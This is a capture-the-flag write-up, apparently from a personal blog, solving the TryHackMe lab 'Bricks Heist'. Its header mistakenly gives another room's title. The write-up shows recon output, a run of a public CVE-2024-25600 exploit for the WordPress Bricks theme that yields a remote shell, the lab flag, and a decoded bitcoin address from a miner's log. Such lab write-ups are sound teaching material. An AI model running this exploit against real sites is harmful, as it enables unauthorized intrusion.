A w1se guy 0nce said, the answer is usually as plain as day.
| Title | W1seGuy |
|---|
| Description | A w1se guy 0nce said, the answer is usually as plain as day. |
| Points | 60 |
| Difficulty | Easy |
| Maker | DrGonz0, hadrian3689 |
Summary
TryHack3M: Bricks Heist, in this machine we exploit a vulnerable theme in wordpress, this gets us an anuthenticated RCE, once in, we look around to investigate the heist case, through a suspecious service to finding the suspects behind it.
An nmap scan, the port 80 wasn’t useful and same for mysql which is only accessible internally.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| βββ(azadin)-[~/tryhackme]
ββ$ nmap -p$ports -sC -sV -Pn -n 10.10.131.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-03 23:02 UTC
Nmap scan report for 10.10.131.51
Host is up (0.65s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7a:59:9b:e6:2b:a5:38:55:ef:9a:c5:6f:c7:b7:0a:99 (RSA)
| 256 0e:c7:51:cc:8f:27:6d:bb:89:ca:84:62:a8:e2:42:f2 (ECDSA)
|_ 256 f9:a1:1a:f4:8c:77:90:b2:e2:d1:38:47:ea:96:fc:5e (ED25519)
80/tcp open http Python http.server 3.5 - 3.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
443/tcp open ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after: 2025-04-02T11:59:14
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 6.5
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Brick by Brick
|_http-server-header: Apache
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.55 seconds
|
since we’re dealing with wordpress let’s enumerate further using wpscan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| βββ(azadin)-[~/tryhackme]
ββ$ wpscan --url https://bricks.thm/ -e u,vp --no-update --disable-tls-checks
....
[+] WordPress theme in use: bricks
| Location: https://bricks.thm/wp-content/themes/bricks/
| Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
| Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
| Style Name: Bricks
| Style URI: https://bricksbuilder.io/
| Description: Visual website builder for WordPress....
| Author: Bricks
| Author URI: https://bricksbuilder.io/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.9.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
.....
|
this is the interesting part, we have the version 1.9.5 and the them, I used the following exploit :
https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
and to run it :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| βββ(.venv)β(azadin)-[~/tryhackme]
ββ$ python CVE-2024-25600.py -u https://bricks.thm -t 5
/home/chida/sus/oo/ok/CVE-2024-25600.py:20: SyntaxWarning: invalid escape sequence '\ '
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \\
_______ ________ ___ ____ ___ __ __ ___ ___________ ____ ____
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \
/ / | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / /
/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ __/____/ / /_/ / /_/ / /_/ /
\____/ |___/_____/ /____/\____/____/ /_/ /____/_____/\____/\____/\____/
Coded By: K3ysTr0K3R --> Hello, Friend!
[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://bricks.thm
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell>
|
and we got a shell !
Flags
In the same directory we got a shell at:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}
|
Now we need to find the suspecious process, running :
1
2
3
| systemctl | grep running
ubuntu.service loaded active running TRYHACK3M
|
and the following stand out, let’s investigate this service more !
since it’s a service, we’ll find its unit file at /etc/systemd/system/ubuntu.service, or we can just do
1
2
3
4
5
6
7
8
9
10
11
12
13
| -> systemctl cat ubuntu.service
# /etc/systemd/system/ubuntu.service
[Unit]
Description=TRYHACK3M
[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure
[Install]
WantedBy=multi-user.target
apache@tryhackme:/etc/systemd/system$
|
looks like we found the name of the suspecious process : nm-inet-dialog, and also the service name assocaited with it : ubuntu.service.
let’s dig more into this by going to /lib/NetworkManager !
here we find the file inet.conf which is the log file we are looking for.
1
2
3
4
5
6
7
8
9
10
| 2024-04-08 10:46:20,757 [*] Miner()
2024-04-08 10:46:22,760 [*] Miner()
2024-04-08 10:46:24,762 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:48:04,647 [*] confbak: Ready!
2024-04-08 10:48:04,648 [*] Status: Mining!
2024-04-08 10:48:08,649 [*] Miner()
2024-04-08 10:48:08,649 [*] Bitcoin Miner Thread Started
2024-04-08 10:48:08,649 [*] Status: Mining!
2024-04-08 10:48:10,651 [*] Miner()
|
next decode the weird string :
1
2
3
| βββ(.venv)β(azadinγΏkali)-[~/tryhackme]
ββ$ echo "5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d" | xxd -r -p | base64 -d | base64 -d
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
|
these are 2 bitcoin addresses, the one we are interested in is the first: bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67
looking this up online with some osint here and there, the threat group this was linked to is lockbit.
